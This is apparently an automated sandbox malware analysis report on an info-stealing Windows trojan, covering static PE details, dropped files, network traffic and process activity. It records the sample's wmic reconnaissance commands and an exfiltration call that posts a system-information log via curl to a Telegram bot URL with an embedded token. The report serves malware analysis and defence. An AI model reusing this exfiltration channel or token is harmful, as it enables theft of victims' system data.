                https://api.telegram.org/bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4/sendDocumentapi.telegram.curl.exe, 0000002D.00000002.2423296304.00000265942FD000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000002D.00000003.2422964793.00000265942FD000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000002D.00000003.2422919071.00000265942FD000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  https://docs.rs/getrandom#nodejs-es-module-support9KEZfGRjyK.exefalse
                    		high

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    149.154.167.220
                    		api.telegram.orgUnited Kingdom
                    		62041TELEGRAMRUfalse

                    Private

                    IP
                    127.0.0.1

                    General Information

                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1578571
                    Start date and time:2024-12-19 22:51:13 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 7m 30s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Run name:Run with higher sleep bypass
                    Number of analysed new started processes analysed:49
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:9KEZfGRjyK.exe
                    renamed because original name is a hash value
                    Original Sample Name:73b0e64dcc0df2f2ac4d461245021e6a.exe
                    Detection:MAL
                    Classification:mal68.troj.evad.winEXE@64/2@1/2
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 17
                    • Number of non-executed functions: 54
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                    • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                    Warnings

                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                    • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.63
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                    • VT rate limit hit for: 9KEZfGRjyK.exe

                    Simulations

                    Behavior and APIs

                    No simulations

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    149.154.167.220file.exeGet hashmaliciousNetSupport RAT, LummaC, Amadey, Blank Grabber, LummaC Stealer, PureLog StealerBrowse
                      PURCHASE ORDER TRC-090971819130-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                        PAYMENT ADVICE 750013-1012449943-81347-pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                          66776676676.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                            _Company.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              F.O Pump Istek,Docx.batGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                D.G Governor Istek,Docx.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                  Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                    PAYMENT SWIFT AND SOA TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse

                                      Domains

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      api.telegram.orgPURCHASE ORDER TRC-090971819130-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                      • 149.154.167.220
                                      PAYMENT ADVICE 750013-1012449943-81347-pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                      • 149.154.167.220
                                      66776676676.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                      • 149.154.167.220
                                      _Company.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 149.154.167.220
                                      F.O Pump Istek,Docx.batGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                      • 149.154.167.220
                                      D.G Governor Istek,Docx.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                      • 149.154.167.220
                                      Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 149.154.167.220
                                      PAYMENT SWIFT AND SOA TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                      • 149.154.167.220
                                      chrome11.exeGet hashmaliciousUnknownBrowse
                                      • 149.154.167.220

                                      ASNs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      TELEGRAMRUfile.exeGet hashmaliciousNetSupport RAT, LummaC, Amadey, Blank Grabber, LummaC Stealer, PureLog StealerBrowse
                                      • 149.154.167.220
                                      file.exeGet hashmaliciousScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, VidarBrowse
                                      • 149.154.167.99
                                      PURCHASE ORDER TRC-090971819130-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                      • 149.154.167.220
                                      PAYMENT ADVICE 750013-1012449943-81347-pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                      • 149.154.167.220
                                      66776676676.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                      • 149.154.167.220
                                      pM3fQBuTLy.exeGet hashmaliciousVidarBrowse
                                      • 149.154.167.99
                                      QIo3SytSZA.exeGet hashmaliciousVidarBrowse
                                      • 149.154.167.99
                                      _Company.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 149.154.167.220
                                      F.O Pump Istek,Docx.batGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                      • 149.154.167.220

                                      JA3 Fingerprints

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      74954a0c86284d0d6e1c4efefe92b521Hkeyboard.dllGet hashmaliciousUnknownBrowse
                                      • 149.154.167.220
                                      67618a47ee8c5.vbsGet hashmaliciousMint StealerBrowse
                                      • 149.154.167.220
                                      PKO_0019868519477_PDF_#U2462#U2465#U2461#U2465#U2467#U2464#U2464#U2466.htaGet hashmaliciousMint StealerBrowse
                                      • 149.154.167.220
                                      webhook.exeGet hashmaliciousUnknownBrowse
                                      • 149.154.167.220
                                      loader.exeGet hashmaliciousUnknownBrowse
                                      • 149.154.167.220
                                      loader.exeGet hashmaliciousUnknownBrowse
                                      • 149.154.167.220
                                      chos.exeGet hashmaliciousUnknownBrowse
                                      • 149.154.167.220
                                      file.exeGet hashmaliciousUnknownBrowse
                                      • 149.154.167.220
                                      yiDQb6GkBq.exeGet hashmaliciousAmadey, LummaC Stealer, VidarBrowse
                                      • 149.154.167.220

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      C:\Users\user\Desktop\system_info.txt

                                      Download File
                                      Process:C:\Users\user\Desktop\9KEZfGRjyK.exe
                                      File Type:ASCII text, with CRLF, CR, LF line terminators
                                      Category:dropped
                                      Size (bytes):3358
                                      Entropy (8bit):4.791561075407849
                                      Encrypted:false
                                      SSDEEP:96:z5KdsjuDyC2+IO8WQSkKdQevBh+Uq1OcCX8:9KdUC2+XhQSkKJJhtLX8
                                      MD5:F4D3002C25DCD1A598654E64A975DBCC
                                      SHA1:9C43AF74974F4952478416121A6A12127AE2136E
                                      SHA-256:A7399E3071E0477668D288F205BDE73A3FB858E55AD7EACC1EA6DE9E7BBCE92E
                                      SHA-512:7F7C99F0974F923DE8022802B9F8C83C627672F0E70470404A1E87D41886B42A83998486E3EE75709C8C75CE03FBD74B2CA5D59AF804FA22B4BF4308DE13DAFE
                                      Malicious:false
                                      Preview:Computer Name: user-PC.User Name: user.BIOS Serial Number: SerialNumber ...C5XHUPDMPN.Motherboard Serial Number: SerialNumber ...6347204322332955.CPU Info: Name ...Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz ...Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz.Total RAM: TotalPhysicalMemory ...4293971968.Disk Info: Model Size ...ZTSOLTV4 SCSI Disk Device 412300001200.Antivirus: displayName ...Windows Defender.MAC Address: Physical Address Transport Name ..=================== ==========================================================..EC-F4-BB-EA-15-88 \Device\Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}.System Info: Host Name: user-PC..OS Name: Microsoft Windows 10 Pro..OS Version: 10.0.19045 N/A Build 19045..OS Manufacturer: Microsoft Corporation..OS Configuration: Standalone Workstation..OS Build Type:

                                      \Device\Null

                                      Download File
                                      Process:C:\Windows\System32\curl.exe
                                      File Type:ASCII text, with CRLF, CR line terminators
                                      Category:dropped
                                      Size (bytes):478
                                      Entropy (8bit):3.2730702919143195
                                      Encrypted:false
                                      SSDEEP:6:I2swj2SAykymUeC3/8UniegCSgOgcdivIdpVvTmV96DA2FcaV//IJ96R:Vz6ykymUePbnc9cdd7riKA2FN1ImR
                                      MD5:671EE09B65B69E3F51F1C11059CD158F
                                      SHA1:910C897ECB9DC7D3E9CB85C41AF9FA75282841AA
                                      SHA-256:F54DC2E3A6025115D306B7EA462D969CFC890127B623C43582F19218AA3026DC
                                      SHA-512:72051024BC1C4C17DACF71B214E38FDC509008E9F4F701E6111211F8E1AFB0178A98705166D4FAA06AB6829FDE27C90A7F56E748486DFE8C3DC42BBDC50E1E78
                                      Malicious:false
                                      Preview: % Total % Received % Xferd Average Speed Time Time Time Current.. Dload Upload Total Spent Left Speed... 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0. 0 0 0 0 0 0 0 0 --:--:-- 0:00:01 --:--:-- 0.100 3664 0 0 100 3664 0 1445 0:00:02 0:00:02 --:--:-- 1446.100 4130 100 466 100 3664 180 1417 0:00:02 0:00:02 --:--:-- 1599..

                                      Static File Info

                                      General

                                      File type:PE32+ executable (GUI) x86-64, for MS Windows
                                      Entropy (8bit):6.301112846910871
                                      TrID:
                                      • Win64 Executable GUI (202006/5) 92.65%
                                      • Win64 Executable (generic) (12005/4) 5.51%
                                      • Generic Win/DOS Executable (2004/3) 0.92%
                                      • DOS Executable Generic (2002/1) 0.92%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:9KEZfGRjyK.exe
                                      File size:378'880 bytes
                                      MD5:73b0e64dcc0df2f2ac4d461245021e6a
                                      SHA1:ff75ef00e33fb953964d6bbe1d86d5ad8bb8c9ba
                                      SHA256:99a4d0ac34848d665529220a0a04edd2753aba9ffe8434286967875d05643400
                                      SHA512:e6921dcba48d193bd592d316613a3fffc7bdf03868ff07dd2553cc32bbf2318dc54f777a90ecb2c2782471567f7657f9185f65814e43e7c0f5d820593ccbcf99
                                      SSDEEP:6144:lE3fAFcnP6AAHOZ7Uh2EaGQGGapOdTFTh8kJM1VZn:lE34FgAEGQGGTx+WM1
                                      TLSH:B9845B25FE565DACD58BC0B482128A726932B8CE0B31B9FF12D442353E69AF16F3C754
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......H7...V`..V`..V`......V`...c..V`...d..V`...e.$V`.G.a..V`..Va..V`..V`.6V`......V`...b..V`.Rich.V`.........PE..d.....dg.........."

                                      File Icon

                                      Icon Hash:90cececece8e8eb0

                                      Static PE Info

                                      General

                                      Entrypoint:0x140038d60
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x140000000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x67648104 [Thu Dec 19 20:24:36 2024 UTC]
                                      TLS Callbacks:0x4002a890, 0x1
                                      CLR (.Net) Version:
                                      OS Version Major:6
                                      OS Version Minor:0
                                      File Version Major:6
                                      File Version Minor:0
                                      Subsystem Version Major:6
                                      Subsystem Version Minor:0
                                      Import Hash:df132870cc8376ee210867916013d887

                                      Entrypoint Preview

                                      Instruction
                                      dec eax
                                      sub esp, 28h
                                      call 00007F13A49273E8h
                                      dec eax
                                      add esp, 28h
                                      jmp 00007F13A4926F77h
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      nop word ptr [eax+eax+00000000h]
                                      dec eax
                                      sub esp, 10h
                                      dec esp
                                      mov dword ptr [esp], edx
                                      dec esp
                                      mov dword ptr [esp+08h], ebx
                                      dec ebp
                                      xor ebx, ebx
                                      dec esp
                                      lea edx, dword ptr [esp+18h]
                                      dec esp
                                      sub edx, eax
                                      dec ebp
                                      cmovb edx, ebx
                                      dec esp
                                      mov ebx, dword ptr [00000010h]
                                      dec ebp
                                      cmp edx, ebx
                                      jnc 00007F13A4927118h
                                      inc cx
                                      and edx, 8D4DF000h
                                      wait
                                      add al, dh

                                      Rich Headers

                                      Programming Language:
                                      • [IMP] VS2008 SP1 build 30729

                                      Data Directories

                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x582bc0x104.rdata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x5f0000x1f8.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x5b0000x2a9c.pdata
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x600000x668.reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x50ff00x54.rdata
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x512000x28.rdata
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x50eb00x140.rdata
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x400000x458.rdata
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                      Sections

                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x10000x3ed700x3ee00b18ef078dbb571020d954c6b115eb34cFalse0.4967344371272366data6.355785043053073IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rdata0x400000x192fa0x19400a57eadc0bc392731421b1ee050a6b056False0.38722153465346537data5.407331463120315IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .data0x5a0000xac00x200cdb4f452a9c373c6ece62e34b50b2fbeFalse0.28515625data2.4546151187241256IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .pdata0x5b0000x2a9c0x2c00a18a17c2855b033d9d8056b0eb1b3c8cFalse0.4833984375data5.455692511911118IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .padding0x5e0000x8a40xa007b7f26e348909ab91cf74011db8d3a94False0.891015625data7.3761949714995865IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .rsrc0x5f0000x1f80x200f63d27195363577233775bb9fd0e9a51False0.484375data2.830251446092126IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .reloc0x600000x6680x800e005ebc65f734c9ef812873e4dc54879False0.5458984375data4.849281107799458IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                      Resources

                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                      RT_VERSION0x5f0600x198OpenPGP Public KeyEnglishUnited States0.5122549019607843

                                      Imports

                                      DLLImport
                                      api-ms-win-core-synch-l1-2-0.dllWakeByAddressAll, WakeByAddressSingle, WaitOnAddress
                                      bcryptprimitives.dllProcessPrng
                                      bcrypt.dllBCryptGenRandom
                                      ADVAPI32.dllSystemFunction036
                                      kernel32.dllEncodePointer, RaiseException, RtlPcToFileHeader, RtlUnwindEx, IsProcessorFeaturePresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, IsDebuggerPresent, InitializeSListHead, GetStdHandle, GetCurrentProcessId, GetSystemTimeAsFileTime, GetCurrentThreadId, WriteFileEx, SleepEx, GetExitCodeProcess, TerminateProcess, GetSystemTimePreciseAsFileTime, SetWaitableTimer, HeapReAlloc, lstrlenW, ReleaseMutex, FindClose, CreateWaitableTimerExW, GetFileInformationByHandle, GetFileInformationByHandleEx, GetCurrentThread, FindFirstFileW, ReadFile, GetOverlappedResult, CancelIo, GetCurrentProcess, SetThreadStackGuarantee, GetConsoleMode, SetFileInformationByHandle, GetModuleHandleW, GetModuleFileNameW, CreateNamedPipeW, ReadFileEx, WaitForMultipleObjects, GetFullPathNameW, GetSystemDirectoryW, GetWindowsDirectoryW, CreateProcessW, GetFileAttributesW, InitializeProcThreadAttributeList, UpdateProcThreadAttribute, MultiByteToWideChar, WriteConsoleW, WideCharToMultiByte, CreateThread, GetModuleHandleA, AddVectoredExceptionHandler, GetEnvironmentVariableW, GetEnvironmentStringsW, CompareStringOrdinal, GetCurrentDirectoryW, WaitForSingleObjectEx, LoadLibraryA, CreateMutexA, DeleteProcThreadAttributeList, FreeEnvironmentStringsW, GetTimeZoneInformationForYear, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, FormatMessageW, SetLastError, RtlVirtualUnwind, TlsAlloc, WaitForSingleObject, CreateEventW, TlsGetValue, TlsSetValue, GetLastError, TlsFree, HeapAlloc, FreeLibrary, RtlLookupFunctionEntry, GetProcAddress, HeapFree, GetProcessHeap, GetComputerNameExW, CloseHandle, RtlCaptureContext, QueryPerformanceCounter, DuplicateHandle, Sleep, CreateFileW, LoadLibraryExW
                                      ntdll.dllRtlNtStatusToDosError, NtReadFile, NtWriteFile
                                      api-ms-win-crt-string-l1-1-0.dllstrcpy_s, wcsncmp
                                      api-ms-win-crt-runtime-l1-1-0.dllexit, _initterm_e, _initialize_onexit_table, _get_initial_narrow_environment, _initialize_narrow_environment, _configure_narrow_argv, __p___argc, _set_app_type, _seh_filter_exe, _crt_atexit, terminate, __p___argv, abort, _cexit, _c_exit, _register_onexit_function, _exit, _register_thread_local_exe_atexit_callback, _initterm
                                      api-ms-win-crt-math-l1-1-0.dll__setusermatherr
                                      api-ms-win-crt-stdio-l1-1-0.dll__p__commode, _set_fmode
                                      api-ms-win-crt-locale-l1-1-0.dll_configthreadlocale
                                      api-ms-win-crt-heap-l1-1-0.dllcalloc, malloc, free, _set_new_mode

                                      Possible Origin

                                      Language of compilation systemCountry where language is spokenMap
                                      EnglishUnited States

                                      Network Behavior

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Dec 19, 2024 22:53:17.641104937 CET49770443192.168.2.4149.154.167.220
                                      Dec 19, 2024 22:53:17.641160965 CET44349770149.154.167.220192.168.2.4
                                      Dec 19, 2024 22:53:17.641242027 CET49770443192.168.2.4149.154.167.220
                                      Dec 19, 2024 22:53:17.653472900 CET49770443192.168.2.4149.154.167.220
                                      Dec 19, 2024 22:53:17.653486967 CET44349770149.154.167.220192.168.2.4
                                      Dec 19, 2024 22:53:19.020442963 CET44349770149.154.167.220192.168.2.4
                                      Dec 19, 2024 22:53:19.020539999 CET49770443192.168.2.4149.154.167.220
                                      Dec 19, 2024 22:53:19.021861076 CET49770443192.168.2.4149.154.167.220
                                      Dec 19, 2024 22:53:19.021908045 CET44349770149.154.167.220192.168.2.4
                                      Dec 19, 2024 22:53:19.022144079 CET44349770149.154.167.220192.168.2.4
                                      Dec 19, 2024 22:53:19.025609016 CET49770443192.168.2.4149.154.167.220
                                      Dec 19, 2024 22:53:19.025815964 CET49770443192.168.2.4149.154.167.220
                                      Dec 19, 2024 22:53:19.025851965 CET44349770149.154.167.220192.168.2.4
                                      Dec 19, 2024 22:53:20.075598955 CET44349770149.154.167.220192.168.2.4
                                      Dec 19, 2024 22:53:20.075678110 CET44349770149.154.167.220192.168.2.4
                                      Dec 19, 2024 22:53:20.075772047 CET49770443192.168.2.4149.154.167.220
                                      Dec 19, 2024 22:53:20.083760977 CET49770443192.168.2.4149.154.167.220
                                      Dec 19, 2024 22:53:20.083801985 CET44349770149.154.167.220192.168.2.4

                                      UDP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Dec 19, 2024 22:53:17.500544071 CET5517853192.168.2.41.1.1.1
                                      Dec 19, 2024 22:53:17.637466908 CET53551781.1.1.1192.168.2.4

                                      DNS Queries

                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Dec 19, 2024 22:53:17.500544071 CET192.168.2.41.1.1.10x6215Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                      DNS Answers

                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Dec 19, 2024 22:53:17.637466908 CET1.1.1.1192.168.2.40x6215No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                      HTTP Request Dependency Graph

                                      • api.telegram.org

                                      HTTPS Proxied Packets

                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.449770149.154.167.2204435740C:\Windows\System32\curl.exe
                                      TimestampBytes transferredDirectionData
                                      2024-12-19 21:53:19 UTC251OUTPOST /bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4/sendDocument HTTP/1.1
                                      Host: api.telegram.org
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Content-Length: 3664
                                      Content-Type: multipart/form-data; boundary=------------------------edbae48fbd31f91b
                                      2024-12-19 21:53:19 UTC3664OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 65 64 62 61 65 34 38 66 62 64 33 31 66 39 31 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 2d 34 31 39 33 37 31 30 32 37 31 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 65 64 62 61 65 34 38 66 62 64 33 31 66 39 31 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 38 34 33 33 30 2d 34 31 38 30 2d 31 2e 6c 6f 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d
                                      Data Ascii: --------------------------edbae48fbd31f91bContent-Disposition: form-data; name="chat_id"-4193710271--------------------------edbae48fbd31f91bContent-Disposition: form-data; name="document"; filename="284330-4180-1.log"Content-Type: text/plain
                                      2024-12-19 21:53:20 UTC388INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Thu, 19 Dec 2024 21:53:19 GMT
                                      Content-Type: application/json
                                      Content-Length: 466
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-12-19 21:53:20 UTC466INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 30 33 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 30 36 38 33 39 39 30 37 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 56 69 72 74 75 61 6c 62 65 61 6d 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 69 72 74 75 61 6c 62 65 61 6d 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 31 39 33 37 31 30 32 37 31 2c 22 74 69 74 6c 65 22 3a 22 50 72 69 76 61 74 65 20 2d 20 73 74 6f 72 61 67 65 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 36 34 35
                                      Data Ascii: {"ok":true,"result":{"message_id":3033,"from":{"id":7068399075,"is_bot":true,"first_name":"Virtualbeam","username":"Virtualbeam_bot"},"chat":{"id":-4193710271,"title":"Private - storage","type":"group","all_members_are_administrators":true},"date":1734645


                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      Click to dive into process behavior distribution

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      General

                                      Target ID:0
                                      Start time:16:52:04
                                      Start date:19/12/2024
                                      Path:C:\Users\user\Desktop\9KEZfGRjyK.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\Desktop\9KEZfGRjyK.exe"
                                      Imagebase:0x7ff7f4100000
                                      File size:378'880 bytes
                                      MD5 hash:73B0E64DCC0DF2F2AC4D461245021E6A
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:1
                                      Start time:16:52:04
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                      Wow64 process (32bit):false
                                      Commandline:"wmic" bios get serialnumber
                                      Imagebase:0x7ff6f2f80000
                                      File size:576'000 bytes
                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:2
                                      Start time:16:52:04
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:3
                                      Start time:16:52:05
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                      Wow64 process (32bit):false
                                      Commandline:"wmic" baseboard get serialnumber
                                      Imagebase:0x7ff6f2f80000
                                      File size:576'000 bytes
                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:4
                                      Start time:16:52:05
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:5
                                      Start time:16:52:05
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                      Wow64 process (32bit):false
                                      Commandline:"wmic" cpu get name
                                      Imagebase:0x7ff6f2f80000
                                      File size:576'000 bytes
                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:6
                                      Start time:16:52:05
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\conhost.exe
